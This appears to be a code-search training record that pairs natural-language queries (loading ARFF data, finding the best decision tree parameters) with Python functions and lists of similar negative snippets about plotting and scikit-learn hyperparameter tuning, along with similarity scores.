0.35, label='desired')\n plt.ylim(-5, 80)\n plt.legend()\n\n plt.draw()\n plt.pause(0.000001)\n plt.clf()", "def drawBolts(self,view):\r\n for bolt in self.getBolts():\r\n bolt.draw(view)", "def balance(self):\n return self._rbal - self._lbal", "def plot(t): \n assert isinstance(t, int), \"'t' argument should be an integer.\"\n assert t > 0, \"'t' argument should be a positive integer.\" \n # Initialize arrays with zeros to store mean cumulative rewards upto t \n # rounds for each of the three implemented bandit algorithms\n EpsGreedy_rewards = np.zeros(t)\n UCB_rewards = np.zeros(t)\n LinUCB_rewards = np.zeros(t)\n # For each round, store the mean cumulative rewards upto that round\n for i in range(1,t):\n 
EpsGreedy_rewards[i] = np.sum(results_EpsGreedy[0:i]) / t\n UCB_rewards[i] = np.sum(results_UCB[0:i]) / t\n LinUCB_rewards[i] = np.sum(results_LinUCB[0:i]) / t\n # Plot running per round cumulative reward\n plt.plot(range(0,t), EpsGreedy_rewards, color='b', label='e-Greedy')\n plt.plot(range(0,t), UCB_rewards, color='g', label='UCB')\n plt.plot(range(0,t), LinUCB_rewards, color='orange', label='LinUCB')\n plt.xlabel('Round')\n plt.ylabel('Mean Cumulative Reward')\n plt.title('Running Per Round Cumulative Reward')\n plt.legend()\n plt.show()", "def plotLoss():\n # ssr\n ssr = np.log(gradientDescent(X, y)[1])\n # number of iterations \n iterations = np.log(np.arange(1, len(ssr) + 1, 1))\n # plot reduction of ssr\n plt.plot(iterations, ssr)\n # xlabel\n plt.xlabel(\"Iteration\")\n # ylabel\n plt.ylabel(\"SSR\")\n # title\n plt.title(\"Reduction of SSR by number of Iterations\")\n # show plot \n plt.show()", "def costovertime(endclasses, app, costtype='expected cost'):\n costovertime = cost_table(endclasses, app)\n plt.plot(list(costovertime.index), costovertime[costtype])\n plt.title('Total '+costtype+' of all faults over time.')\n plt.ylabel(costtype)\n plt.xlabel(\"Time (\"+str(app.units)+\")\")\n plt.grid()", "def __repr__(self) -> str:\n return f\"Bank({self.balance}, {self.bet})\"" ]
[ "0.6470689", "0.62615764", "0.618939", "0.5848157", "0.58320725", "0.5751623", "0.5716817", "0.5682445", "0.56821924", "0.56675744", "0.5648744", "0.5599107", "0.5581174", "0.5550323", "0.5517062", "0.5514832", "0.54800415", "0.54709786", "0.5425537", "0.54238087", "0.5382205", "0.53711027", "0.5350087", "0.5349848", "0.53112686", "0.52882284", "0.527825", "0.52674305", "0.5238933", "0.52361184", "0.5235", "0.52225685", "0.52177435", "0.52147824", "0.52115756", "0.52102834", "0.5207359", "0.5195552", "0.5189379", "0.5184997", "0.51740426", "0.51714575", "0.5159294", "0.5144024", "0.51420605", "0.51228607", "0.5122118", "0.5120399", "0.5116186", "0.51022446", "0.5101852", "0.5096412", "0.50951785", "0.50929695", "0.50925815", "0.5090533", "0.50903463", "0.5086222", "0.50695467", "0.5056686", "0.50497365", "0.50305045", "0.5029833", "0.50278145", "0.5019516", "0.50136244", "0.5011389", "0.50084513", "0.49997485", "0.49986804", "0.499514", "0.49943736", "0.49903634", "0.49849582", "0.4981833", "0.49804908", "0.49804908", "0.49773884", "0.4974798", "0.49739426", "0.49661383", "0.49567854", "0.49560815", "0.4955321", "0.49531296", "0.4952347", "0.49521738", "0.49496284", "0.49464715", "0.49458325", "0.49415788", "0.4937927", "0.4931714", "0.4930924", "0.49285764", "0.49195182", "0.4912592", "0.49115992", "0.49100682", "0.49099198" ]
0.7392071
0
Load data and convert class type to str
def load_data(dataset_path: str):
    data = arff.loadarff(dataset_path)
    data_frame = pd.DataFrame(data[0])
    return data_frame
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _convert_to_str(self, data):\n raise NotImplementedError()", "def loaddata(cls, data, auto_cls=True):\n keys = data.dtype.fields if hasattr(data, 'dtype') else data\n if auto_cls and 'class' in keys:\n cls_components = str(data['class']).split('.')\n mod_name = '.'.join(cls_components[:-1])\n cls_name = cls_components[-1]\n try:\n mod = import_module(mod_name)\n except ImportError:\n mod = import_module(__name__)\n cls = getattr(mod, cls_name)\n obj = cls(board_size=None)\n obj.deserialize(data)\n return obj", "def loads(self, data):\n return loads(data)", "def __str__(self):\n return str(self.__data)", "def __str__(self):\n return str(self.data)", "def __str__(self):\n return str(self.data)", "def __str__(self):\n return str(self.data)", "def __str__(self):\n return str(self.data)", "def __str__(self):\n return str(self.data)", "def __str__(self):\n return self.data.__str__()", "def __str__(self):\n return self.data.__str__()", "def load_data(self) -> None:", "def load_data(self):", "def load_hickle_4_x_string(h_node,base_type,py_obj_type):\n if not 'object' in h_node.dtype.name or h_node.attrs.get('str_type',None) is not None:\n return load_list_dataset(h_node,base_type,py_obj_type)\n content = h_node[()]\n if py_obj_type is str:\n return content if isinstance(content,str) else content.decode('utf8')\n return py_obj_type(content) if content.__class__ is not py_obj_type else content", "def __str__(self):\n str(self.data)\n return str", "def __str__(self) -> str:\n return str(self.data)", "def __str__(self):\n return str(self._data)", "def __str__(self):\n return str(self.get_data())", "def load(cls, data):\n if isinstance(data, dict):\n print('>>> dict')\n else:\n print('>>> obj')\n # cls_fields = fields(cls)\n init()", "def get_load(self):\n return str(self.load)", "def class_to_db(self):", "def load(self):", "def as_str(self) -> str:\n if isinstance(self.data, str):\n return self.data\n elif isinstance(self.data, bytes):\n return self.data.decode()\n else:\n return bytes(self.data).decode()", "def load_data(self):\n raise NotImplementedError()", "def _as_string(self, name):\n org_type = self._get_type(name)\n if org_type == 'string': return None\n valid = ['single', 'delimited set', 'int', 'float', 'date']\n if not org_type in valid:\n msg = 'Cannot convert variable {} of type {} to text!'\n raise TypeError(msg.format(name, org_type))\n self._meta['columns'][name]['type'] = 'string'\n if self._get_type in ['single', 'delimited set']:\n self._meta['columns'][name].pop('values')\n self._data[name] = self._data[name].astype(str)\n return None", "def convertTo( self, cls, data=True, keys=True ):\n return self.g.convertTo( cls, data=data, keys=keys )", "def load(self):\n pass", "def load(self):\n pass", "def load(self):\n pass", "def load(self):\n pass", "def load(cls,data:{}, X=None):\n return cls._load(data=data, X=X)", "def loads(data):\n return cPickle.loads(data)", "def dataclass(self, arg: SeField[Any]) -> str:\n if arg.flatten:\n flattened = []\n for f in sefields(arg.type, self.serialize_class_var):\n f.parent = arg # type: ignore\n flattened.append(self.render(f))\n return \", \".join(flattened)\n else:\n return (\n f\"{arg.varname}.{SERDE_SCOPE}.funcs['{self.func}']({arg.varname},\"\n \" reuse_instances=reuse_instances, convert_sets=convert_sets)\"\n )", "def _toStringSubclass(self, text, subclass):\r\n self.endData()\r\n self.handle_data(text)\r\n self.endData(subclass)", "def serialize(self, data):\n if isinstance(data, str):\n return data\n\n if hasattr(data, \"read\"):\n 
return data.read()\n\n raise ValueError(\"Unable to handle input format: %s\" % type(data))", "def post_load(self, data):\n return data", "def __str__(self):\n return bytes_to_str(bytes(self))", "def convertInstanceData(self, builder, typeName, data):\n\t\tif typeName not in self.instanceDataTypeMap:\n\t\t\traise Exception('Instance data type \"' + typeName + '\" hasn\\'t been registered.')\n\n\t\tconvertedData = self.instanceDataTypeMap[typeName](self, data)\n\n\t\ttypeNameOffset = builder.CreateString(typeName)\n\t\tdataOffset = builder.CreateByteVector(convertedData)\n\n\t\tObjectData.Start(builder)\n\t\tObjectData.AddType(builder, typeNameOffset)\n\t\tObjectData.AddData(builder, dataOffset)\n\t\treturn ObjectData.End(builder)", "def load_class(self):\n if not os.path.exists(self.savefile):\n self.save_class()\n\n with open(self.savefile, \"r\") as f:\n data = json.load(f)\n for key, value in data.items():\n # set every dict key to an atribute of the class\n setattr(self, key, value) # self.key = value", "def loads(data):\n return Decoder().decode(data)", "def _deserialize_primitive(data, klass):\n try:\n value = klass(data)\n except UnicodeEncodeError:\n value = unicode(data)\n except TypeError:\n value = data\n return value", "def ingest(d):\n if isinstance(d, rawtype):\n return raw2str(d)\n elif isinstance(d, safetype):\n return d\n else:\n raise TypeError(\"Can't ingest data of type %s\" % type(d))", "def load(cls, data):\n if cls.Schema is None: # pragma: no cover\n msg = (\"Schema of this Model are not specified! For example: \"\n \"class User(BaseModel): ...; class UserSchema(Schema): ...; \"\n \"User.Schema = UserSchema\")\n raise NotImplementedError(msg)\n\n res = cls.Schema().load(data)\n if len(res.errors) == 0:\n return res.data\n else:\n raise Exception(\"Errors: {}\".format(res.errors))", "def to_representation(self, data): # lint-amnesty, pylint: disable=arguments-differ\n return str(data)", "def to_representation(self, data): # lint-amnesty, pylint: disable=arguments-differ\n return str(data)", "def load(self):\n\n raise NotImplementedError", "def test_user_type_repr():\n Person = Map.from_file(\"definitions/Person.buf\")\n me = Person(name=\"Bede Kelly\", age=20)\n assert \"Person(name='Bede Kelly', age=20)\" == str(me) == repr(me)", "def __str__(self):\n return str(self.serialize())", "def deserialize(self, data):", "def bytes_to_str(self, data):\n if isinstance(data, str):\n return data\n return data.decode(\"utf-8\")", "def load(self):\n raise NotImplementedError", "def load(self):\n raise NotImplementedError", "def load(cls):\n playerdata = Data.raw_load(\"savedata.dat\")\n for key in playerdata:\n cls.name = playerdata[\"name\"]\n cls.max_hp = playerdata[\"max_hp\"]\n cls.hp = playerdata[\"hp\"]\n cls.lv = playerdata[\"lv\"]\n cls.exp = playerdata[\"exp\"]\n cls.atk = playerdata[\"atk\"]\n cls._def = playerdata[\"_def\"]\n cls.inventory = playerdata[\"inventory\"]\n cls.pin = playerdata[\"pin\"]", "def __repr__(self):\n return str(self.data)", "def load(self):\n return loads(self.get_attr().Value())", "def load_classes():\n \tfnm = \"../datasets/bbc/bbc.classes\"\n \tconverters = { \"docid\": toInt, \"docid\":toInt}\n \tX = pandas.read_table(fnm, header=None, sep=\" \", skiprows=4, comment=\"%\", names= [\"docid\", \"classid\"], converters=converters)\n \treturn X", "def serialize(self, data):", "def convert_to_string(user_data):\n # type: (Any) -> str\n if isinstance(user_data, Mapping):\n return convert_dict_to_string(user_data)\n\n # hydra ConfigNode special 
case:\n if hasattr(user_data, \"node\"):\n return convert_dict_to_string(user_data.node)\n\n if hasattr(user_data, \"numpy\"):\n user_data = convert_tensor_to_numpy(user_data)\n\n if isinstance(user_data, bytes) and not isinstance(user_data, str):\n user_data = user_data.decode(\"utf-8\")\n\n return str(user_data)", "def __str__(self):\n\t\treturn str(self.dato)", "def __str__(self):\n return str(self.GetString())", "def load(cls, data):\n return cls(**data)", "def to_content(cls, data: Mapping) -> str:", "def serialize(self, data):\n if isinstance(data, str):\n try:\n with open(data, \"rb\") as data_file:\n data_file_info = data_file.read()\n return data_file_info\n except Exception as e:\n raise ValueError(f\"Could not open/read file: {data}. {e}\")\n if isinstance(data, bytes):\n return data\n\n raise ValueError(f\"Object of type {type(data)} is not Data serializable.\")", "def get_data_class(self):\n return self.data_class", "def __str__(self):\n return self.__unicode__().encode('utf-8').decode()", "def test_repr(self, cls):\n inst = cls()\n # Exact values aren't a concern so long as neither direction\n # raises an exception.\n pkl = cloudpickle.dumps(inst)\n cloudpickle.loads(pkl)", "def _get_converted_data(self):\n pass", "def TypeclassToString(_type):\r\n\r\n typestring = str(type(_type))\r\n\r\n if typestring == \"<class 'type'>\":\r\n # This means that _type is a Python data type, and not an instance of that type.\r\n typestring = str(_type)\r\n\r\n # Formatting typestring to remove \"<class '\" and \"'>\" parts\r\n typestring = typestring.replace(\"<class '\", \"\")\r\n typestring = typestring.replace(\"'>\", \"\")\r\n\r\n return typestring", "def _load(self, data):\n raise NotImplementedError(\"Don't know how to load the task\")", "def convert_txt_to_data():\n pass", "def __str__(self):\n return '\\tNo readable data representation.'", "def load(self):\n return", "def load(self, input):", "def __str__(self) -> str:\n return str(self.getvalue())", "def __str__(self) -> str:\n return str(self.getvalue())", "def __str__(self) -> str:\n return str(self.getvalue())", "def __load_class_representation(self, filename):\n\n # Reads in the reverse dictionary from the given file.\n with open(filename) as file:\n return json.load(file)", "def __str__(self):\n return bytes_to_string(self._bytes)", "def GetDataAsObject(self):", "def load(self):\n raise NotImplementedError()", "def load(self):\n raise NotImplementedError()", "def to_string(self, smirnoff_data):\n pass", "def build_from_string(self, obj):\n if self.string_type is unicode and not isinstance(obj, unicode):\n obj = str(obj).decode('utf-8')\n if self.string_type is str and not isinstance(obj, str):\n obj = unicode(obj).encode('utf-8')\n return self.art_type(obj.splitlines())", "def __repr__(self):\n return '%s.from_text(%r)' % (self.__class__.__name__, self.to_text())", "def load_and_print_info(data_module_class: type) -> None:\n\n parser = argparse.ArgumentParser()\n data_module_class.add_to_argparse(parser)\n args = parser.parse_args()\n dataset = data_module_class(args)\n dataset.setup()\n print(dataset)", "def convert_to_class(sim, dat_out):\n return dat_out", "def toString(data):\n\tif isString(data):\n\t\treturn data\n\telse:\n\t\treturn data.decode(\"latin-1\")", "def test_return_type(self):\n self.assertEqual(type(self.obj.to_json_string(self.valid_ld)), str)", "def load(self, input):\n pass", "def load(cls,data, recovery_mode = False):\n opid = _read_delimited_field(data)\n operation_type = _read_delimited_field(data)\n 
modlogger.debug( \"loading: %s,%s\"%(opid,operation_type))\n return _operation_type_map[operation_type].load(opid,data, recovery_mode = recovery_mode)", "def load(cls, filename):\n with open(filename, \"r\") as fp:\n ret = load(fp)\n if not isinstance(ret, cls):\n raise TypeError(\"invalid serialized type: expected '%s' \"\n \"got '%s'\" % (cls, type(ret)))\n return ret", "def data_type_str(self):\n return data_ref_type_str(self.data_type)", "def __str__(self):\n value = \"<Task: Unknown format.>\"\n try:\n value = json.dumps(self.__data)\n except ValueError:\n pass\n return value", "def saveClassroomData():\n with open(\"ClassRoomData.txt\",\"wb\") as classroomData:\n pickle.dump(classroomEntities,classroomData)", "def load(filename):\n print(uc.load(filename))", "def load_data(ctx, klass=None):\n if klass:\n if klass and not klass.startswith(\"public_data.models\"):\n klass = f\"public_data.models.{klass}\"\n options = {\"class\": klass}\n connecter = ScalingoInterface(ctx.obj)\n connecter.manage_py(\"load_data\", **options)", "def __repr__(self) :\n\n return str(self.data)", "def test_strmethod(self):\n b1 = BaseModel()\n self.assertEqual(type(str(b1)), str)", "def serialize(self, data):\n return data", "def load(input_path):\n\n dill._dill._reverse_typemap['ClassType'] = type\n with open(input_path, \"rb\") as file:\n return dill.load(file)", "def data_types(self):" ]
[ "0.64354247", "0.6280863", "0.6222278", "0.6192303", "0.61756396", "0.61756396", "0.61756396", "0.61756396", "0.61756396", "0.616021", "0.616021", "0.61370295", "0.61201906", "0.6067332", "0.6043132", "0.60146064", "0.60138565", "0.60008734", "0.5951044", "0.58738834", "0.5801465", "0.5661682", "0.56616336", "0.56599665", "0.56414795", "0.5629093", "0.5618559", "0.5618559", "0.5618559", "0.5618559", "0.5613107", "0.55840445", "0.55754334", "0.5568804", "0.55574596", "0.5535466", "0.5529598", "0.55190283", "0.55148715", "0.5497996", "0.54961574", "0.54907995", "0.5488022", "0.5471705", "0.5471705", "0.5446906", "0.54364395", "0.5429029", "0.54274184", "0.54259026", "0.5422482", "0.5422482", "0.54212636", "0.5414343", "0.54040307", "0.5402181", "0.53826785", "0.53806", "0.5371038", "0.53689915", "0.5368679", "0.5358244", "0.53473085", "0.5324215", "0.5305768", "0.53040767", "0.53040725", "0.5303472", "0.5300149", "0.52986646", "0.52860886", "0.52791935", "0.52787167", "0.52783746", "0.52783746", "0.52783746", "0.5264983", "0.5264674", "0.5263552", "0.526308", "0.526308", "0.5250329", "0.52485645", "0.52484626", "0.5237584", "0.523347", "0.523002", "0.52239287", "0.52168983", "0.52164996", "0.52156085", "0.5215348", "0.52070564", "0.5197517", "0.51974624", "0.5195433", "0.5193724", "0.5187396", "0.51863617", "0.5176907", "0.51747257" ]
0.0
-1
Find best parameters for decision tree
def find_best_classifier(x_train, x_test, y_train, y_test):
    max_depth, _ = find_best_parameters(
        'max_depth', list(range(1, 30)), x_train, x_test, y_train, y_test)
    print("Best max_depth t: ", max_depth)
    min_samples_split, _ = find_best_parameters(
        'min_samples_split', list(range(2, 400)), x_train, x_test, y_train, y_test)
    min_samples_split = int(min_samples_split)
    print("Best min samples split: ", min_samples_split)
    min_samples_leaf, _ = find_best_parameters(
        'min_samples_leaf', list(range(2, 200)), x_train, x_test, y_train, y_test)
    min_samples_leaf = int(min_samples_leaf)
    print("Best sample leaf: ", min_samples_leaf)
    max_leaf_nodes, _ = find_best_parameters(
        'max_leaf_nodes', list(range(2, 150)), x_train, x_test, y_train, y_test)
    max_leaf_nodes = int(max_leaf_nodes)
    print("Best max leaf nodes split: ", max_leaf_nodes)
    min_impurity_decrease, _ = find_best_parameters(
        'min_impurity_decrease', np.arange(0.0005, 0.1, 0.0005), x_train, x_test, y_train, y_test)
    print("Best min impurity decrease: ", min_impurity_decrease)
    clf = DecisionTreeClassifier(
        min_impurity_decrease=min_impurity_decrease,
        max_depth=max_depth,
        min_samples_leaf=min_samples_leaf,
        max_leaf_nodes=max_leaf_nodes,
        min_samples_split=min_samples_split,
        random_state=0)
    clf = clf.fit(x_train, y_train)
    return clf
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def select_model():\r\n from sklearn import tree\r\n import graphviz\r\n\r\n ValidationSetAndLabels = AllSets[1]\r\n ValLabels = ValidationSetAndLabels[:, [-1]] # extract labels (last column)\r\n ValSet = np.delete(ValidationSetAndLabels, -1, axis=1) # delete labels\r\n\r\n TrainingSetAndLabels = AllSets[2]\r\n TrainLabels = TrainingSetAndLabels[:, [-1]] # extract labels (last column)\r\n TrainSet = np.delete(TrainingSetAndLabels, -1, axis=1) # delete labels\r\n\r\n \"\"\"\r\n This is the code to select the best hyperparameter (part b)\r\n\r\n for SplitCriterion in ['entropy', 'gini']:\r\n print \"Criterion: \" + SplitCriterion + '\\n'\r\n\r\n for MaxDepth in [int(depth) for depth in np.linspace(1, np.log2(TrainSet.shape[1]), 5)]:\r\n print \"max_depth: \" + str(MaxDepth) + '\\n'\r\n\r\n MyTree = tree.DecisionTreeClassifier(criterion=SplitCriterion, max_depth=MaxDepth)\r\n MyTree = MyTree.fit(TrainSet, TrainLabels)\r\n\r\n Predictions = MyTree.predict(ValSet)\r\n Result = np.abs(Predictions - ValLabels.flatten())\r\n\r\n Accuracy = 100 * float(np.count_nonzero(Result == 0)) / Predictions.shape[0]\r\n\r\n print \"Accuracy for this test is: %f %%\" %Accuracy\r\n print '\\n'\r\n\r\n print '\\n'\r\n \"\"\"\r\n\r\n MyTree = tree.DecisionTreeClassifier(criterion='entropy', max_depth=12)\r\n\r\n MyTree = MyTree.fit(TrainSet, TrainLabels)\r\n\r\n Predictions = MyTree.predict(ValSet)\r\n Result = np.abs(Predictions - ValLabels.flatten())\r\n\r\n Accuracy = 100 * float(np.count_nonzero(Result == 0)) / Predictions.shape[0]\r\n\r\n dot_data = tree.export_graphviz(MyTree, out_file=None, max_depth=2,\r\n feature_names=AllSets[3], filled=True, rounded=True, special_characters=True,\r\n class_names=TrainLabels.flatten().astype(str))\r\n graph = graphviz.Source(dot_data)\r\n graph.render(\"output\")", "def decision_tree(original_training_data,call_depth):\n\n ''' Checking the stopping criterion. If yes then it returns the majority class (Muffin or CupCake) '''\n if check_if_stopping_criterion_is_met(original_training_data.values) or call_depth > 10:\n majority = classification(original_training_data)\n return majority\n\n else:\n ''' Each time we split the data and go deeper, we increment the depth of the tree '''\n call_depth += 1\n\n ''' Finding the best attribute, best threshold to split data, best minimum entropy '''\n best_split_index, best_attribute, best_threshold, best_minimum_entropy = find_best_attribute_threshold_entropy(original_training_data)\n original_training_data_values = original_training_data.values\n\n best_split_values = original_training_data_values[:,best_split_index]\n\n less_than_threshold = original_training_data[best_split_values <= best_threshold]\n more_than_threshold = original_training_data[best_split_values > best_threshold]\n\n ''' Initializing a variable called as condition which stores the format of the key for the resulting decision tree dictionary '''\n condition = original_training_data.columns[best_split_index] + \" <= \" + str(best_threshold)\n\n ''' Initializing a dictionary where key is condition and value is a list. 
This is the basic data structure in which the\n resulting decision tree is stored '''\n sub_tree = {condition: []}\n\n ''' Calling the decision tree recursively '''\n left_tree = decision_tree(less_than_threshold, call_depth)\n right_tree = decision_tree(more_than_threshold, call_depth)\n\n ''' For removing edge cases where on either split, the resulting decision tree gives the same result '''\n if left_tree == right_tree:\n sub_tree = left_tree\n else:\n ''' Appending the smaller trees in the final decision tree '''\n sub_tree[condition].append(left_tree)\n sub_tree[condition].append(right_tree)\n\n return sub_tree", "def findBestScore():\n resultList = []\n BestScore = 0\n # iterate through different max_depths from 1 to 19\n for max_depth in range(1,20):\n dtree = tree.DecisionTreeClassifier(max_depth=max_depth)\n trainng_score = []\n testing_score = []\n # run 10 different cross-validation\n for index in range(10):\n # split into cross-validation sets.\n cv_data_train, cv_data_test, cv_target_train, cv_target_test = \\\n cross_validation.train_test_split(X_train, y_train, test_size=0.1)\n # fit the model using the cross-validation data\n # and tune parameter, such as max_depth here\n dtree = dtree.fit(cv_data_train, cv_target_train)\n dtree.feature_importances_\n trainng_score += [dtree.score(cv_data_train,cv_target_train)]\n testing_score += [dtree.score(cv_data_test,cv_target_test)]\n\n # Compute the average score for both traning and testing data\n trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)\n testing_avgScore = 1.0 * sum(testing_score)/len(testing_score)\n\n # find the best score\n if testing_avgScore > BestScore:\n BestScore = testing_avgScore\n best_depth = max_depth\n resultList += [[best_depth, trainng_avgScore, testing_avgScore]]\n print ('The best average score and the corresponding max_depth is: ')\n return BestScore, best_depth", "def find_best_params(features, target, n_folds=5):\n # prepare hyperparameter set\n params = {'n_neighbors': np.arange(1, 25)}\n # init the search algorithm\n clf = GridSearchCV(KNeighborsClassifier(), params,cv=n_folds)\n # fit the dataset\n clf.fit(features, target)\n # return best hyperparameters\n return clf.best_params_", "def param_selection(X, Y, nfolds, param_grid, classifier):\n grid_search = GridSearchCV(classifier, param_grid, cv = nfolds)\n grid_search.fit(X, Y)\n grid_search.best_params_\n return grid_search.best_params_", "def tree(self):\n\n tree_parameters = [{'min_samples_leaf': list(range(2, 10, 1)),\n 'criterion': ['mae', 'mse'],\n 'random_state': [1]}]\n tree_grid = GridSearchCV(estimator=DecisionTreeRegressor(),\n param_grid=tree_parameters,\n scoring=self.scorer, cv=5, n_jobs=-1,\n iid=False)\n tree_grid_result = tree_grid.fit(self.X_train, self.y_train)\n best_tree_parameters = tree_grid_result.best_params_\n tree_score = tree_grid_result.best_score_\n print('Best tree params: ' + str(best_tree_parameters))\n print('Tree score: ' + str(tree_score))\n return DecisionTreeRegressor(\n min_samples_leaf=best_tree_parameters['min_samples_leaf'],\n criterion=best_tree_parameters['criterion'],\n random_state=1)", "def optimization_parameters():\n param_distributions = {\n \"n_estimators\": list(range(50, 300, 50)),\n \"max_features\": [\"auto\", \"log2\"],\n \"max_depth\": list(range(1, 21, 2)),\n \"min_samples_leaf\": list(range(4, 22, 2)),\n \"min_samples_split\": list(range(5, 30, 5)),\n \"criterion\": [\"gini\", \"entropy\"],\n }\n param_grid = {\n \"n_estimators\": list(range(50, 300, 50)),\n \"max_depth\": 
list(range(1, 21, 2)),\n \"min_samples_leaf\": list(range(4, 22, 2)),\n \"min_samples_split\": list(range(5, 30, 5)),\n \"criterion\": [\"gini\", \"entropy\"],\n }\n\n rfc = RandomForestClassifier()\n\n # 5 * 10 * 9 * 5 * 2 = 4500 iterations\n # will take a lot of time\n model = GridSearchCV(\n estimator=rfc,\n param_grid=param_grid,\n scoring=\"accuracy\",\n verbose=10,\n n_jobs=1,\n cv=5,\n )\n # initiates Randomized Search \n model = RandomizedSearchCV(\n estimator=rfc,\n param_distributions=param_distributions,\n n_iter=20,\n scoring='accuracy',\n verbose=10,\n n_jobs=1,\n cv=5,\n )\n \n # fit and predict the model\n model.fit(x_train, y_train)\n pred = model.predict(x_test)\n \n # define evaluation metric as accuracy score\n acc = accuracy_score(y_test, pred) * 100\n print(f\"RandomForestClassifier with GridSearchCV: {acc:0.2f}%\")\n print(\"Best parameters set:\")\n\n # extract best parameters \n best_parameters = model.best_estimator_.get_params()\n for param_name in sorted(param_grid.keys()):\n print(f\"\\t{param_name}: {best_parameters[param_name]}\")", "def fit_decision_tree(model, x_train, y_train):\r\n model.fit(x_train, y_train)\r\n score = model.score(x_train, y_train)\r\n importance = model.feature_importances_\r\n return score, importance", "def prior_params_tree(self):\n id = {name:i for i, name in enumerate(list(self.tree.keys()))}\n n_nodes = len(id)\n dist_mx = np.zeros((n_nodes, n_nodes))\n\n for node1, edges in self.tree.items():\n for node2, dist in edges.dist:\n dist_mx[id[node1], id[node2]] = dist\n dist_mx[id[node2], id[node1]] = dist\n\n # while np.count_nonzero(dist_mx) < (n_nodes ** 2 - n_nodes):\n for _ in range(20):\n for i, j in combinations(range(n_nodes), 2):\n if dist_mx[i,j] > 0:\n continue\n row_i = dist_mx[i]\n row_j = dist_mx[j]\n value = (row_i + row_j) * (row_i > 0) * (row_j > 0)\n dist_mx[i, j] = dist_mx[j, i] = - max(np.unique(value))\n dist_mx = np.abs(dist_mx)\n\n evolve_rate = []\n for node1, node2 in combinations(self.m_cov.keys(), 2):\n mx_cov_dist = np.abs(self.m_cov[node1] - self.m_cov[node2])\n elements = mx_cov_dist[np.triu_indices(len(mx_cov_dist))]\n norm_elements = elements / dist_mx[id[node2], id[node1]]\n evolve_rate += list(norm_elements)\n\n\n\n df = np.mean([p.shape[0] for _, p in self.m_profiles.items()])\n p_theta_alpha = df/2\n # p_theta_alpha = 4\n p_theta_beta = np.percentile(evolve_rate, 75) * (p_theta_alpha - 1)\n # print(p_theta_alpha, p_theta_beta)\n return p_theta_alpha, p_theta_beta", "def test_decision_tree_min_samples_split_parameter(params, X_train, X_test, y_train, y_test):", "def param_tune(self):\n grid = {'bootstrap': [True, False],\n 'max_depth': [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, None],\n 'max_features': ['auto', 'sqrt'],\n 'min_samples_leaf': [1, 2, 4],\n 'min_samples_split': [2, 5, 10],\n 'n_estimators': [200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 2000]}\n\n rf = RandomForestClassifier()\n rf_grid = GridSearchCV(estimator=rf, param_distributions=grid, verbose=2, n_jobs=-1)\n rf_grid.fit(self.X_train, self.y_train)\n self.results.write(str(rf_grid.best_params_) + \"\\n\")", "def tune_and_find_parameter(self,algo_name, algo, rating_data,param_grid):\n\n\n print(\"tuning for\", algo_name, \"hyperparameters\")\n\n # algo: algo class name\n grid_search = GridSearchCV(algo, param_grid, measures=['rmse', 'mae'])\n grid_search.fit(rating_data)\n\n print('best RMSE for ', algo_name, ' ', grid_search.best_score['rmse'])\n\n best_params = grid_search.best_params['rmse']\n # print the best set of 
parameters\n print(\"best params:\", best_params)\n return best_params", "def param_selection(df):\n n = df.count()\n numTrees = np.round(np.log10(n) * 100)\n maxDepth = np.round(np.log(n))\n minInstancesPerNode = np.round(np.log10(n) * (np.ceil(n / 500000) + 1))\n #maxBins = np.minimum(80, np.round(500 / np.log(n)))\n subsamplingRate = float(np.where(n > 500000, 0.6, 0.8))\n maxIter = np.round(np.log10(n) * 50)\n\n # minInstancesPerNode\n\n minInstancesPerNode = 200 if minInstancesPerNode > 200 else maxDepth\n minInstancesPerNode = 25 if minInstancesPerNode < 25 else minInstancesPerNode\n\n # maxDepth\n\n maxDepth = 15 if maxDepth > 15 else maxDepth\n maxDepth = 3 if maxDepth < 3 else maxDepth\n\n # maxIter applies to GBT\n\n maxIter = 200 if maxIter > 100 else maxIter\n maxIter = 50 if maxIter < 50 else maxIter\n\n # maxBins set to 32\n\n maxBins = 32\n\n print \"[Info] numTrees: \" + str(numTrees)\n print \"[Info] maxDepth: \" + str(maxDepth)\n print \"[Info] minInstancesPerNode: \" + str(minInstancesPerNode)\n print \"[Info] maxBins: \" + str(maxBins)\n print \"[Info] subsamplingRate: \" + str(subsamplingRate)\n print \"[Info] maxIter: \" + str(maxIter)\n\n return numTrees, maxDepth, minInstancesPerNode, maxBins, subsamplingRate, maxIter", "def guessTreeOpt(train, test, valid):\n best = findApproxDepth(train, valid, 5, 5)\n tree = DecisionTree(train)\n print(\"building tree from full set\")\n tree.buildTree(best[0], best[1], True)\n print(\"tree built, testing tree\")\n acc = testTreeF(tree, test)\n print(\"accuracy of:\", \"%.2f\" % (acc * 100))\n return tree", "def get_optimal_param(data_desc, ml_model_desc):\n if ml_model_desc == 'ANN': \n # return [<num_layers>, <momentum>, <learn rate>]\n if data_desc == 'young_students_ti_courses':\n return [100, 0.5, 0.001]\n elif data_desc == 'young_students_lic_courses':\n return [36, 0.9, 1.0]\n elif data_desc == 'young_students_comp_courses':\n return [36, 0.6, 0.001]\n elif data_desc == 'old_students':\n return [24, 0.5, 0.7]\n else:\n exit('can not get optimal parameters for the combination passed!')\n elif ml_model_desc == 'naive_bayes':\n if data_desc == 'young_students_ti_courses':\n return [GaussianNB()]\n elif data_desc == 'young_students_lic_courses':\n return [BernoulliNB()]\n elif data_desc == 'young_students_comp_courses':\n return [MultinomialNB()]\n elif data_desc == 'old_students':\n return [GaussianNB()]\n else:\n exit('can not get optimal parameters for the combination passed!')\n elif ml_model_desc == 'SVR': \n if data_desc == 'young_students_ti_courses':\n return ['linear', 1.0]\n elif data_desc == 'young_students_lic_courses':\n return ['linear', 1.0]\n elif data_desc == 'young_students_comp_courses':\n return ['rbf', 1.0]\n elif data_desc == 'old_students':\n return ['linear', 1.0]\n else:\n exit('can not get optimal parameters for the combination passed!')\n else: \n exit('can not get optimal parameters for the combination passed!')", "def random_param_tune(self):\n random_grid = {'bootstrap': [True, False],\n 'max_depth': [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, None],\n 'max_features': ['auto', 'sqrt'],\n 'min_samples_leaf': [1, 2, 4],\n 'min_samples_split': [2, 5, 10],\n 'n_estimators': [200, 400, 600, 800, 1000, 1200, 1400, 1600, 1800, 